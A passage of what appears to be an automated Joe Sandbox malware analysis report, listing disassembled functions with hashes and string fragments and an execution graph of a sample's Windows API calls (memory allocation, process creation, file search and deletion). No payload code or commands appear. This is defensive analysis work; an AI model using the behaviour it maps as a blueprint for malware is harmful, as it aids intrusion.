                                                                Function 039DFBA1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: cea681e08875a9d83c8cfd66a42f0c4f2c2397c22b41c7ac82dff82d1172ec09
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: B4E065B62043087BDA10EE99DC49FAB33ACEFC8710F004419F909AB241D7B0BD118BB4
                                                                Function 039CE551 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                                • Instruction ID: 76a1ef110398bb8de4049d235edb2c77c08d93eb200ae76f59defa91444314b0
                                                                • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                                • Instruction Fuzzy Hash: EBF08271C1524CEBDF14CF64D841BDEBBB8EB04320F1087ADE8259B280E63497508781
                                                                Function 039DF841 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: 4e0245658e2edca8316f0c70edf34f4e552144a094dc0bf916a6928bdf0e46f9
                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 1DE04636244208BBE620EA5ADC42FDBB7ACDFC5710F004419FA0CAB241C6B0B91586F0
                                                                Function 039E1951 Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b604f70faa193a511ffc00a9ba2102b0b5352e2f87c70e95fe3c82e934c9439
                                                                • Instruction ID: 2e22ff263a321106b7daf67f7385baeac463435500a576da1e20d18d4088f643
                                                                • Opcode Fuzzy Hash: 3b604f70faa193a511ffc00a9ba2102b0b5352e2f87c70e95fe3c82e934c9439
                                                                • Instruction Fuzzy Hash: 1BC012756003087BD640DA88CC47F65339C9748610F404050B90D8B241E574B9504755

                                                                Non-executed Functions

                                                                Function 00A3CB3B Relevance: 21.6, Strings: 17, Instructions: 338COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                                • API String ID: 0-2604029153
                                                                • Opcode ID: 42523a91f73f217738a8ad6d96c4818f305878fdb03b3f1d771c2e1715a6438b
                                                                • Instruction ID: e67b84f3e355df18e3e181d8dd375d751efc5e49c49abb1380d5c0291c558775
                                                                • Opcode Fuzzy Hash: 42523a91f73f217738a8ad6d96c4818f305878fdb03b3f1d771c2e1715a6438b
                                                                • Instruction Fuzzy Hash: EE02B2B0D05269CBEB24CF85CD94BDDBBB2BB45308F2081DAD1097B280D7B95A89DF54
                                                                Function 00A39295 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e9bbb53e3539e7af09374373e32d1746217baad1df3696705cc7ad831cd22a8
                                                                • Instruction ID: 00c701f4ecc9e890b24a93d63ec1184b5d20ac5d7204e501095ba4bccb98d910
                                                                • Opcode Fuzzy Hash: 7e9bbb53e3539e7af09374373e32d1746217baad1df3696705cc7ad831cd22a8
                                                                • Instruction Fuzzy Hash: 19C09247F491560246258C4A79700F5FBA9D1C32F6A50B7ABDD68B3A804692CA6942CD
                                                                Function 039CA358 Relevance: 51.4, Strings: 41, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                • API String ID: 0-3248090998
                                                                • Opcode ID: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                                • Instruction ID: cb8263c622cc691dea60343ec2510c9617899dd5c2827e6ac60336ec8fc86dc4
                                                                • Opcode Fuzzy Hash: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                                • Instruction Fuzzy Hash: FE91FFF08052A98ACB118F55A5603DFBF71BB95204F1581EDC6AA7B243C3BE4E46DF90
                                                                Function 039C091C Relevance: 26.4, Strings: 21, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                                • API String ID: 0-617331232
                                                                • Opcode ID: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                                • Instruction ID: 39188b68bca42b6a5dc9dfb66050e112d963a4ea5d6d7f8bc25107628d2c05bb
                                                                • Opcode Fuzzy Hash: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                                • Instruction Fuzzy Hash: 719116B0D05669CBEB60CF85D9587DEBBB1BB45308F1081C9C1593B281CBBA1A89CF95
                                                                Function 039C0921 Relevance: 26.4, Strings: 21, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                                • API String ID: 0-617331232
                                                                • Opcode ID: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                                • Instruction ID: e63c6cbefeb25b60712c572f3bccc138af23440cbaf3eac85ebddcd268ba3524
                                                                • Opcode Fuzzy Hash: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                                • Instruction Fuzzy Hash: F99127B0D05769CBEB60CF85D9587DEBBB1BB05308F1081C9C1593B281CBBA1A89CF95
                                                                Function 039C50B8 Relevance: 13.8, Strings: 11, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                • API String ID: 0-685823316
                                                                • Opcode ID: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                                • Instruction ID: 5b1336a0c34d7f173c05c82dc98bdb42177bbd0779db2850c32f45692877fafb
                                                                • Opcode Fuzzy Hash: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                                • Instruction Fuzzy Hash: 483198B5D10318AAEF10DFE0DC85FEE7BB9AF48700F00815CE6187A180DBB556488BA5
                                                                Function 039BD8C1 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &$0$1$?$F$V$i
                                                                • API String ID: 0-3123711973
                                                                • Opcode ID: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                                • Instruction ID: 63949ab0e523873d47ebf92bb3fb4e3770303179a8209336e3c0b11a8a5543f3
                                                                • Opcode Fuzzy Hash: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                                • Instruction Fuzzy Hash: 9411C910D087CA9DDB22CABC89482AEBF711F23224F4883D994F12A2D6D2754606C7A6
                                                                Function 039CC731 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$4$A$n
                                                                • API String ID: 0-4168700205
                                                                • Opcode ID: d73cc434336410cdfdd71110f8e7ff97fecde8f4f35086e6cd62e914452b6f07
                                                                • Instruction ID: 1900c2d1628af835675820df44e8b81ea612a6c14a9d31408f84c53f309166c3
                                                                • Opcode Fuzzy Hash: d73cc434336410cdfdd71110f8e7ff97fecde8f4f35086e6cd62e914452b6f07
                                                                • Instruction Fuzzy Hash: 523144B5910209BBDB04DFA4CC41BFEB7B8EF44304F008199E909AB240E775AE458BE5
                                                                Function 039B9E4A Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 1$C$VKXA$W]PE
                                                                • API String ID: 0-3703782850
                                                                • Opcode ID: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                                • Instruction ID: d40841f1207eb61840a4a274fb3a85bc56d4b7ee4cc3bf7b4a24f4e4df967f3b
                                                                • Opcode Fuzzy Hash: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                                • Instruction Fuzzy Hash: F8F0A0B090020C6BCB00EFA8D9446EEBBB8EF40300F2084A8D8196B202E7349B04CB96

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:3.9%
                                                                Signature Coverage:1.4%
                                                                Total number of Nodes:483
                                                                Total number of Limit Nodes:77
                                                                execution_graph 100783 3209ca0 100785 3209caf 100783->100785 100784 3209cf0 100785->100784 100786 3209cdd CreateThread 100785->100786 101046 321f760 101047 321f7c4 101046->101047 101048 32161f0 2 API calls 101047->101048 101050 321f8f7 101048->101050 101049 321f8fe 101050->101049 101075 3216300 101050->101075 101052 321faa3 101053 321f97a 101053->101052 101054 321fab2 101053->101054 101079 321f540 101053->101079 101055 3229300 NtClose 101054->101055 101057 321fabc 101055->101057 101058 321f9b6 101058->101054 101059 321f9c1 101058->101059 101060 322b4f0 RtlAllocateHeap 101059->101060 101061 321f9ea 101060->101061 101062 321f9f3 101061->101062 101063 321fa09 101061->101063 101064 3229300 NtClose 101062->101064 101088 321f430 CoInitialize 101063->101088 101066 321f9fd 101064->101066 101067 321fa17 101091 3228dd0 101067->101091 101069 321fa92 101070 3229300 NtClose 101069->101070 101071 321fa9c 101070->101071 101072 322b410 RtlFreeHeap 101071->101072 101072->101052 101073 321fa35 101073->101069 101074 3228dd0 LdrInitializeThunk 101073->101074 101074->101073 101076 3216325 101075->101076 101095 3228c60 101076->101095 101080 321f55c 101079->101080 101081 3214460 LdrLoadDll 101080->101081 101083 321f57a 101081->101083 101082 321f583 101082->101058 101083->101082 101084 3214460 LdrLoadDll 101083->101084 101085 321f64e 101084->101085 101086 3214460 LdrLoadDll 101085->101086 101087 321f6ab 101085->101087 101086->101087 101087->101058 101090 321f495 101088->101090 101089 321f52b CoUninitialize 101089->101067 101090->101089 101092 3228dea 101091->101092 101100 3932ba0 LdrInitializeThunk 101092->101100 101093 3228e1a 101093->101073 101096 3228c7a 101095->101096 101099 3932c60 LdrInitializeThunk 101096->101099 101097 3216399 101097->101053 101099->101097 101100->101093 101101 3217060 101102 321707c 101101->101102 101110 32170cf 101101->101110 101104 3229300 NtClose 101102->101104 101102->101110 101103 3217207 101105 3217097 101104->101105 101111 3216480 NtClose LdrInitializeThunk LdrInitializeThunk 101105->101111 101107 32171e1 101107->101103 101113 3216650 NtClose LdrInitializeThunk LdrInitializeThunk 101107->101113 101110->101103 101112 3216480 NtClose LdrInitializeThunk LdrInitializeThunk 101110->101112 101111->101110 101112->101107 101113->101103 101114 321ac60 101119 321a970 101114->101119 101116 321ac6d 101135 321a5f0 101116->101135 101118 321ac89 101120 321a995 101119->101120 101147 3218280 101120->101147 101123 321aae3 101123->101116 101125 321aaf1 101126 321aafa 101125->101126 101130 321abe7 101125->101130 101166 3224de0 101125->101166 101171 321a040 101125->101171 101126->101116 101129 3224de0 GetFileAttributesW 101129->101130 101130->101129 101131 321ac4a 101130->101131 101180 321a3b0 101130->101180 101133 322b410 RtlFreeHeap 101131->101133 101134 321ac51 101133->101134 101134->101116 101136 321a606 101135->101136 101139 321a611 101135->101139 101137 322b4f0 RtlAllocateHeap 101136->101137 101137->101139 101138 321a632 101138->101118 101139->101138 101140 3218280 GetFileAttributesW 101139->101140 101141 321a942 101139->101141 101144 3224de0 GetFileAttributesW 101139->101144 101145 321a040 RtlFreeHeap 101139->101145 101146 321a3b0 RtlFreeHeap 101139->101146 101140->101139 101142 321a95b 101141->101142 101143 322b410 RtlFreeHeap 101141->101143 101142->101118 101143->101142 101144->101139 101145->101139 101146->101139 101148 32182a1 101147->101148 101149 32182a8 GetFileAttributesW 101148->101149 101150 32182b3 101148->101150 101149->101150 101150->101123 101151 32232e0 101150->101151 101152 32232ee 101151->101152 101153 32232f5 101151->101153 101152->101125 101154 3214460 LdrLoadDll 101153->101154 101155 322332a 101154->101155 101156 3223339 101155->101156 101184 3222da0 LdrLoadDll 101155->101184 101158 322b4f0 RtlAllocateHeap 101156->101158 101163 32234e7 101156->101163 101159 3223352 101158->101159 101160 32234dd 101159->101160 101162 322336e 101159->101162 101159->101163 101161 322b410 RtlFreeHeap 101160->101161 101160->101163 101161->101163 101162->101163 101164 322b410 RtlFreeHeap 101162->101164 101163->101125 101165 32234d1 101164->101165 101165->101125 101167 3224e45 101166->101167 101168 3224e7c 101167->101168 101185 32182d0 101167->101185 101168->101125 101170 3224e5e 101170->101125 101172 321a066 101171->101172 101189 321da70 101172->101189 101174 321a0d8 101176 321a260 101174->101176 101177 321a0f6 101174->101177 101175 321a245 101175->101125 101176->101175 101178 3219f00 RtlFreeHeap 101176->101178 101177->101175 101194 3219f00 101177->101194 101178->101176 101181 321a3d6 101180->101181 101182 321da70 RtlFreeHeap 101181->101182 101183 321a45d 101182->101183 101183->101130 101184->101156 101186 32182a6 101185->101186 101187 32182a8 GetFileAttributesW 101186->101187 101188 32182b3 101186->101188 101187->101188 101188->101170 101190 321da82 101189->101190 101191 321daa1 101190->101191 101192 322b410 RtlFreeHeap 101190->101192 101191->101174 101193 321dae4 101192->101193 101193->101174 101195 3219f1d 101194->101195 101198 321db00 101195->101198 101197 321a023 101197->101177 101199 321db24 101198->101199 101200 321dbce 101199->101200 101201 322b410 RtlFreeHeap 101199->101201 101200->101197 101201->101200 101202 3215ae0 101203 3218010 LdrInitializeThunk 101202->101203 101205 3215b10 101203->101205 101206 3215b3c 101205->101206 101207 3217f90 101205->101207 101208 3217fd4 101207->101208 101213 3217ff5 101208->101213 101214 3228620 101208->101214 101210 3217fe5 101211 3218001 101210->101211 101212 3229300 NtClose 101210->101212 101211->101205 101212->101213 101213->101205 101215 322869d 101214->101215 101216 322864c 101214->101216 101219 3934650 LdrInitializeThunk 101215->101219 101216->101210 101217 32286c2 101217->101210 101219->101217 101220 3220060 101221 322007d 101220->101221 101222 3214460 LdrLoadDll 101221->101222 101223 322009b 101222->101223 101224 3229260 101225 32292d4 101224->101225 101227 3229288 101224->101227 101226 32292ea NtDeleteFile 101225->101226 101228 3213063 101229 3217c90 2 API calls 101228->101229 101230 3213073 101229->101230 101231 321308f 101230->101231 101232 3229300 NtClose 101230->101232 101232->101231 101233 3932ad0 LdrInitializeThunk 100792 32126a7 100793 32126e8 100792->100793 100796 32161f0 100793->100796 100795 32126f3 100797 3216223 100796->100797 100798 3216247 100797->100798 100803 3228e70 100797->100803 100798->100795 100800 321626a 100800->100798 100807 3229300 100800->100807 100802 32162ea 100802->100795 100804 3228e8d 100803->100804 100810 3932ca0 LdrInitializeThunk 100804->100810 100805 3228eb9 100805->100800 100808 322931a 100807->100808 100809 322932b NtClose 100808->100809 100809->100802 100810->100805 100811 3219b2f 100812 3219b46 100811->100812 100813 3219b4b 100811->100813 100815 3219b7d 100813->100815 100816 322b410 100813->100816 100819 3229660 100816->100819 100818 322b429 100818->100815 100820 322967a 100819->100820 100821 322968b RtlFreeHeap 100820->100821 100821->100818 100822 320b4b0 100825 322b380 100822->100825 100824 320cb21 100828 3229460 100825->100828 100827 322b3b1 100827->100824 100829 32294f5 100828->100829 100831 322948b 100828->100831 100830 322950b NtAllocateVirtualMemory 100829->100830 100830->100827 100831->100827 101234 32121f0 101235 3212226 101234->101235 101236 3228950 LdrInitializeThunk 101234->101236 101237 321223b 101235->101237 101239 3229390 101235->101239 101236->101235 101240 322941f 101239->101240 101241 32293bb 101239->101241 101244 3932e80 LdrInitializeThunk 101240->101244 101241->101237 101242 3229450 101242->101237 101244->101242 101245 3210cf0 101246 3210d0a 101245->101246 101247 3214460 LdrLoadDll 101246->101247 101248 3210d28 101246->101248 101247->101248 101249 3210d5c PostThreadMessageW 101248->101249 101250 3210d6d 101248->101250 101249->101250 100832 32216b0 100833 32216cc 100832->100833 100834 32216f4 100833->100834 100835 3221708 100833->100835 100836 3229300 NtClose 100834->100836 100837 3229300 NtClose 100835->100837 100838 32216fd 100836->100838 100839 3221711 100837->100839 100842 322b530 RtlAllocateHeap 100839->100842 100841 322171c 100842->100841 101251 3225770 101252 32257d2 101251->101252 101254 32257df 101252->101254 101255 32172c0 101252->101255 101256 32172ab 101255->101256 101258 321732c 101256->101258 101260 321b190 101256->101260 101259 32172b2 101259->101254 101261 321b1b6 101260->101261 101262 321b3e3 101261->101262 101287 32296f0 101261->101287 101262->101259 101264 321b22c 101264->101262 101265 322c5e0 2 API calls 101264->101265 101266 321b24b 101265->101266 101266->101262 101267 321b31f 101266->101267 101268 3228950 LdrInitializeThunk 101266->101268 101269 3215a60 LdrInitializeThunk 101267->101269 101271 321b33e 101267->101271 101270 321b2ad 101268->101270 101269->101271 101270->101267 101275 321b2b6 101270->101275 101273 321b3cb 101271->101273 101293 32284c0 101271->101293 101272 321b307 101274 3218010 LdrInitializeThunk 101272->101274 101281 3218010 LdrInitializeThunk 101273->101281 101280 321b315 101274->101280 101275->101262 101275->101272 101276 321b2e8 101275->101276 101290 3215a60 101275->101290 101308 3224710 LdrInitializeThunk 101276->101308 101280->101259 101283 321b3d9 101281->101283 101282 321b3a2 101298 3228570 101282->101298 101283->101259 101285 321b3bc 101303 32286d0 101285->101303 101288 322970d 101287->101288 101289 322971e CreateProcessInternalW 101288->101289 101289->101264 101309 3228b20 101290->101309 101292 3215a9e 101292->101276 101294 322853d 101293->101294 101295 32284eb 101293->101295 101315 39339b0 LdrInitializeThunk 101294->101315 101295->101282 101296 3228562 101296->101282 101299 32285ea 101298->101299 101300 3228598 101298->101300 101316 3934340 LdrInitializeThunk 101299->101316 101300->101285 101301 322860f 101301->101285 101304 322874d 101303->101304 101305 32286fb 101303->101305 101317 3932fb0 LdrInitializeThunk 101304->101317 101305->101273 101306 3228772 101306->101273 101308->101272 101310 3228bd1 101309->101310 101311 3228b4f 101309->101311 101314 3932d10 LdrInitializeThunk 101310->101314 101311->101292 101312 3228c16 101312->101292 101314->101312 101315->101296 101316->101301 101317->101306 101318 3229170 101319 3229214 101318->101319 101321 3229198 101318->101321 101320 322922a NtReadFile 101319->101320 100843 3218734 100845 3218744 100843->100845 100844 32186f4 100845->100844 100847 3216fe0 100845->100847 100848 3216ff6 100847->100848 100850 321702f 100847->100850 100848->100850 100851 3216e50 LdrLoadDll 100848->100851 100850->100844 100851->100850 100852 3209d00 100855 3209fcf 100852->100855 100853 320a351 100855->100853 100856 322b040 100855->100856 100857 322b083 100856->100857 100862 3203f50 100857->100862 100859 322b08f 100860 322b0c8 100859->100860 100868 3225590 100859->100868 100860->100853 100863 3203f5d 100862->100863 100872 3213170 100862->100872 100865 3203f64 100863->100865 100876 32130e0 100863->100876 100865->100859 100867 3203f6d 100867->100859 100869 32255f2 100868->100869 100871 32255ff 100869->100871 100894 3211910 100869->100894 100871->100860 100873 321318d 100872->100873 100875 32131a6 100873->100875 100880 3229d50 100873->100880 100875->100863 100877 3213112 100876->100877 100877->100867 100878 3229d50 2 API calls 100877->100878 100879 32131a6 100877->100879 100878->100879 100879->100867 100881 3229d6a 100880->100881 100882 3229d99 100881->100882 100887 3228950 100881->100887 100882->100875 100885 322b410 RtlFreeHeap 100886 3229e12 100885->100886 100886->100875 100888 322896a 100887->100888 100891 3932c0a 100888->100891 100889 3228996 100889->100885 100892 3932c11 100891->100892 100893 3932c1f LdrInitializeThunk 100891->100893 100892->100889 100893->100889 100895 321194b 100894->100895 100910 3217da0 100895->100910 100897 3211953 100898 3211c36 100897->100898 100921 322b4f0 100897->100921 100898->100871 100900 3211969 100901 322b4f0 RtlAllocateHeap 100900->100901 100902 321197a 100901->100902 100903 322b4f0 RtlAllocateHeap 100902->100903 100904 321198b 100903->100904 100908 3211a22 100904->100908 100932 3216950 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100904->100932 100907 3211be2 100928 3227ed0 100907->100928 100924 3214460 100908->100924 100911 3217dcc 100910->100911 100933 3217c90 100911->100933 100914 3217e11 100917 3217e2d 100914->100917 100919 3229300 NtClose 100914->100919 100915 3217df9 100916 3217e04 100915->100916 100918 3229300 NtClose 100915->100918 100916->100897 100917->100897 100918->100916 100920 3217e23 100919->100920 100920->100897 100944 3229610 100921->100944 100923 322b50b 100923->100900 100925 3214484 100924->100925 100926 32144c0 LdrLoadDll 100925->100926 100927 321448b 100925->100927 100926->100927 100927->100907 100929 3227f31 100928->100929 100931 3227f3e 100929->100931 100947 3211c50 100929->100947 100931->100898 100932->100908 100934 3217c9a 100933->100934 100938 3217d86 100934->100938 100939 32289f0 100934->100939 100937 3229300 NtClose 100937->100938 100938->100914 100938->100915 100940 3228a0d 100939->100940 100943 39335c0 LdrInitializeThunk 100940->100943 100941 3217d7a 100941->100937 100943->100941 100945 322962a 100944->100945 100946 322963b RtlAllocateHeap 100945->100946 100946->100923 100963 3218070 100947->100963 100949 3211c70 100957 32121d3 100949->100957 100967 3221070 100949->100967 100952 3211e87 100975 322c5e0 100952->100975 100953 3211ccb 100953->100957 100970 322c4b0 100953->100970 100955 3211e9c 100959 3211eec 100955->100959 100981 3210790 100955->100981 100957->100931 100959->100957 100961 3210790 LdrInitializeThunk 100959->100961 100985 3218010 100959->100985 100960 3218010 LdrInitializeThunk 100962 3212040 100960->100962 100961->100959 100962->100959 100962->100960 100964 321807d 100963->100964 100965 32180a5 100964->100965 100966 321809e SetErrorMode 100964->100966 100965->100949 100966->100965 100968 322b380 NtAllocateVirtualMemory 100967->100968 100969 3221091 100968->100969 100969->100953 100971 322c4c0 100970->100971 100972 322c4c6 100970->100972 100971->100952 100973 322b4f0 RtlAllocateHeap 100972->100973 100974 322c4ec 100973->100974 100974->100952 100976 322c550 100975->100976 100977 322b4f0 RtlAllocateHeap 100976->100977 100978 322c5ad 100976->100978 100979 322c58a 100977->100979 100978->100955 100980 322b410 RtlFreeHeap 100979->100980 100980->100978 100982 32107ac 100981->100982 100989 3229580 100982->100989 100986 3218023 100985->100986 100994 3228850 100986->100994 100988 321804e 100988->100959 100990 322959a 100989->100990 100993 3932c70 LdrInitializeThunk 100990->100993 100991 32107b2 100991->100962 100993->100991 100995 32288cb 100994->100995 100996 3228878 100994->100996 100999 3932dd0 LdrInitializeThunk 100995->100999 100996->100988 100997 32288f0 100997->100988 100999->100997 101000 321c500 101002 321c529 101000->101002 101001 321c62d 101002->101001 101003 321c5d3 FindFirstFileW 101002->101003 101003->101001 101006 321c5ee 101003->101006 101004 321c614 FindNextFileW 101005 321c626 FindClose 101004->101005 101004->101006 101005->101001 101006->101004 101322 3217240 101323 3217258 101322->101323 101325 32172b2 101322->101325 101324 321b190 9 API calls 101323->101324 101323->101325 101324->101325 101326 3216cc0 101327 3216cea 101326->101327 101330 3217e40 101327->101330 101329 3216d14 101331 3217e5d 101330->101331 101337 3228a40 101331->101337 101333 3217ead 101334 3217eb4 101333->101334 101335 3228b20 LdrInitializeThunk 101333->101335 101334->101329 101336 3217edd 101335->101336 101336->101329 101338 3228adb 101337->101338 101339 3228a6b 101337->101339 101342 3932f30 LdrInitializeThunk 101338->101342 101339->101333 101340 3228b14 101340->101333 101342->101340 101007 3228900 101008 322891a 101007->101008 101011 3932df0 LdrInitializeThunk 101008->101011 101009 3228942 101011->101009 101012 3228780 101013 322880f 101012->101013 101015 32287ab 101012->101015 101017 3932ee0 LdrInitializeThunk 101013->101017 101014 3228840 101017->101014 101018 3229000 101019 32290b7 101018->101019 101020 322902f 101018->101020 101021 32290cd NtCreateFile 101019->101021 101022 3226000 101023 322605a 101022->101023 101025 3226067 101023->101025 101026 3223a10 101023->101026 101027 322b380 NtAllocateVirtualMemory 101026->101027 101028 3223a51 101027->101028 101029 3214460 LdrLoadDll 101028->101029 101032 3223b5e 101028->101032 101031 3223a97 101029->101031 101030 3223ae0 Sleep 101030->101031 101031->101030 101031->101032 101032->101025 101343 3221a40 101344 3221a59 101343->101344 101345 3221aa4 101344->101345 101348 3221ae7 101344->101348 101350 3221aec 101344->101350 101346 322b410 RtlFreeHeap 101345->101346 101347 3221ab4 101346->101347 101349 322b410 RtlFreeHeap 101348->101349 101349->101350 101352 321fad0 101355 3227430 101352->101355 101354 321faef 101356 3227495 101355->101356 101357 32274c4 101356->101357 101360 321d870 101356->101360 101357->101354 101359 32274a6 101359->101354 101363 321d7e0 101360->101363 101361 